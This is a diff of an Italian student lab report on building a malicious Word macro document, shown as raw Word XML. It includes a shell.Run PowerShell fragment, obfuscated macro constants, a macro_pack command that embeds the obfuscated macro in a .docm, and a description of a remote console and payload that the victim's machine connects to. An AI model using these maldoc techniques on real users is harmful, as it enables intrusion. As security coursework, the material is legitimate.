+        <w:t xml:space="preserve"> con Windows Defender </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>ab</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>litato e le altre impostazioni di sicurezza disabilitate (invio automatico di file d’esempio, protezione cloud ecc.)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e con pacchetto Office installato</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2686,7 +3103,45 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>Ho utilizzato la macchina Windows fornita a lezione e ho scaricato il pac</w:t>
+        <w:t xml:space="preserve">Ho </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>installato</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">con </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>VirtualBox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> una</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> macchina Windows e ho scaricato il pac</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2736,7 +3191,19 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>e due machine sono connesse ad una rete</w:t>
+        <w:t>e due mac</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>hine sono connesse ad una rete</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2762,7 +3229,19 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> il cui indirizzo è 192.168.43.0/24.</w:t>
+        <w:t xml:space="preserve"> il cui indirizzo è 192.168.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>.0/24.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4116,27 +4595,6 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
-</file>
-
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
-</file>
-
-<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<?mso-contentType ?>
-<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
-  <Display>DocumentLibraryForm</Display>
-  <Edit>DocumentLibraryForm</Edit>
-  <New>DocumentLibraryForm</New>
-</FormTemplates>
-</file>
-
-<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Documento" ma:contentTypeID="0x01010003AD22B01210FE489D9BE433888FACA9" ma:contentTypeVersion="16" ma:contentTypeDescription="Creare un nuovo documento." ma:contentTypeScope="" ma:versionID="09fad2276ea52fc6ec20be57fa2916a4">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xmlns:ns4="f1c65361-0737-4e30-bb3a-9e2ed6feafec" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="2cd1dbdccf64e950842932f53b8e29c6" ns3:_="" ns4:_="">
     <xsd:import namespace="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
@@ -4377,33 +4835,28 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{38D7A4B1-5AA0-4687-ADA6-A38D425A54D8}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
 </file>
 
-<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2E3BB391-AD20-4994-9E9B-D3F6C61061F0}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
-    <ds:schemaRef ds:uri="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
 </file>
 
-<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{859E04BA-8E15-4F75-971E-EF4D12FD5774}">
-  <ds:schemaRefs>
-    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
-  </ds:schemaRefs>
-</ds:datastoreItem>
+<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
+<?mso-contentType ?>
+<FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
+  <Display>DocumentLibraryForm</Display>
+  <Edit>DocumentLibraryForm</Edit>
+  <New>DocumentLibraryForm</New>
+</FormTemplates>
 </file>
 
-<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
 <ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F74C8422-D422-4F67-B8D4-238A7F7173C7}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/contentType"/>
@@ -4420,4 +4873,30 @@
     <ds:schemaRef ds:uri="http://schemas.microsoft.com/internal/obd"/>
   </ds:schemaRefs>
 </ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{38D7A4B1-5AA0-4687-ADA6-A38D425A54D8}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2E3BB391-AD20-4994-9E9B-D3F6C61061F0}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
+    <ds:schemaRef ds:uri="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
+</file>
+
+<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{859E04BA-8E15-4F75-971E-EF4D12FD5774}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
+</ds:datastoreItem>
 </file>
--- a/Report_MalDoc.docx
+++ b/Report_MalDoc.docx
@@ -89,25 +89,42 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
+          <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>Email</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
+          <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t xml:space="preserve"> christian.farina@studenti.univr.it</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Titolo1"/>
@@ -343,7 +360,21 @@
           <w:color w:val="92D050"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve">' Esegui il comando </w:t>
+        <w:t>' Esegu</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il comando </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -370,10 +401,12 @@
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>shell.Run</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> "powershell.exe -</w:t>
       </w:r>
@@ -414,7 +447,21 @@
           <w:color w:val="92D050"/>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t xml:space="preserve">' Esegui il comando </w:t>
+        <w:t>' Esegu</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="92D050"/>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> il comando </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1815,37 +1862,15 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
+      <w:r>
         <w:t xml:space="preserve">Sub </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>unzip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>(</w:t>
+        <w:t>unzip(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
         <w:t>)</w:t>
       </w:r>
     </w:p>
@@ -2192,56 +2217,40 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:lang w:val="it-IT"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:lang w:val="it-IT"/>
         </w:rPr>
         <w:t>CODICE MACRO OFFUSCATO</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>Const</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
+      <w:r>
+        <w:t xml:space="preserve">Const </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
         <w:t>ttjizrllxwajdvfd</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
         <w:t xml:space="preserve"> = 2</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Const euspdrz = 1</w:t>
+        <w:t xml:space="preserve">Const </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>euspdrz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = 1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2804,6 +2813,141 @@
         </w:rPr>
         <w:t>Il seguente programma genera un documento Word con la macro offuscata all’interno. Come input è necessario dare la macro non offuscata. (ho dato in input la macro direttamente coi comandi codificati in base 64)</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Prima di tutto bisogna esportare il codice VBA in un file con </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>estensione ”.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>vba</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>”, in seguito bisogna lanciare il comando:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="it-IT" w:eastAsia="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="it-IT" w:eastAsia="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">macro_pack.exe -f </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="it-IT" w:eastAsia="it-IT"/>
+        </w:rPr>
+        <w:t>ThisFile</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="it-IT" w:eastAsia="it-IT"/>
+        </w:rPr>
+        <w:t>.vba</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="it-IT" w:eastAsia="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -o -G myDoc.docm</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">dove macro_pack.exe è l’eseguibile fornito nel repository, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>ThisFile.vba</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> è il codice esportato e myDoc.docm è il documento word che verrà creato, con all’interno la macro offuscata.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2892,7 +3036,43 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>, ho scritto due programmi in C# che rappresentano rispettivamente il client e il server. La vittima aprendo il documento Word malevolo si collega ad un server creato con il comando “</w:t>
+        <w:t xml:space="preserve">, ho scritto due programmi in C# che rappresentano rispettivamente </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>la</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>console</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e il </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>payload</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>. La vittima aprendo il documento Word malevolo si collega ad un server creato con il comando “</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2979,11 +3159,30 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="it-IT"/>
-        </w:rPr>
-        <w:t>L’unico possibile “comando malevolo” che ho implementato è la scrittura di un messaggio da remoto usando il prompt della vittima.</w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>L’unico possibile comando</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:t>che ho implementato è la scrittura di un messaggio da remoto usando il prompt della vittima.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3073,7 +3272,14 @@
         <w:rPr>
           <w:lang w:val="it-IT"/>
         </w:rPr>
-        <w:t>per permettere l’apertura del document</w:t>
+        <w:t xml:space="preserve">per </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="it-IT"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>permettere l’apertura del document</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4296,6 +4502,56 @@
       <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="PreformattatoHTML">
+    <w:name w:val="HTML Preformatted"/>
+    <w:basedOn w:val="Normale"/>
+    <w:link w:val="PreformattatoHTMLCarattere"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00AA1ED7"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="left" w:pos="916"/>
+        <w:tab w:val="left" w:pos="1832"/>
+        <w:tab w:val="left" w:pos="2748"/>
+        <w:tab w:val="left" w:pos="3664"/>
+        <w:tab w:val="left" w:pos="4580"/>
+        <w:tab w:val="left" w:pos="5496"/>
+        <w:tab w:val="left" w:pos="6412"/>
+        <w:tab w:val="left" w:pos="7328"/>
+        <w:tab w:val="left" w:pos="8244"/>
+        <w:tab w:val="left" w:pos="9160"/>
+        <w:tab w:val="left" w:pos="10076"/>
+        <w:tab w:val="left" w:pos="10992"/>
+        <w:tab w:val="left" w:pos="11908"/>
+        <w:tab w:val="left" w:pos="12824"/>
+        <w:tab w:val="left" w:pos="13740"/>
+        <w:tab w:val="left" w:pos="14656"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:val="it-IT" w:eastAsia="it-IT"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="PreformattatoHTMLCarattere">
+    <w:name w:val="Preformattato HTML Carattere"/>
+    <w:basedOn w:val="Carpredefinitoparagrafo"/>
+    <w:link w:val="PreformattatoHTML"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00AA1ED7"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+      <w:lang w:val="it-IT" w:eastAsia="it-IT"/>
+    </w:rPr>
+  </w:style>
 </w:styles>
 </file>
 
@@ -4595,6 +4851,18 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
+</file>
+
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
+</file>
+
+<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Documento" ma:contentTypeID="0x01010003AD22B01210FE489D9BE433888FACA9" ma:contentTypeVersion="16" ma:contentTypeDescription="Creare un nuovo documento." ma:contentTypeScope="" ma:versionID="09fad2276ea52fc6ec20be57fa2916a4">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xmlns:ns4="f1c65361-0737-4e30-bb3a-9e2ed6feafec" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="2cd1dbdccf64e950842932f53b8e29c6" ns3:_="" ns4:_="">
     <xsd:import namespace="b8df6df5-3fad-46ca-9360-c9ec0c0b036b"/>
@@ -4835,18 +5103,6 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
-<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\APASixthEditionOfficeOnline.xsl" StyleName="APA" Version="6"/>
-</file>
-
-<file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="b8df6df5-3fad-46ca-9360-c9ec0c0b036b" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
-</file>
-
 <file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
 <?mso-contentType ?>
 <FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
@@ -4857,6 +5113,24 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{2E3BB391-AD20-4994-9E9B-D3F6C61061F0}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
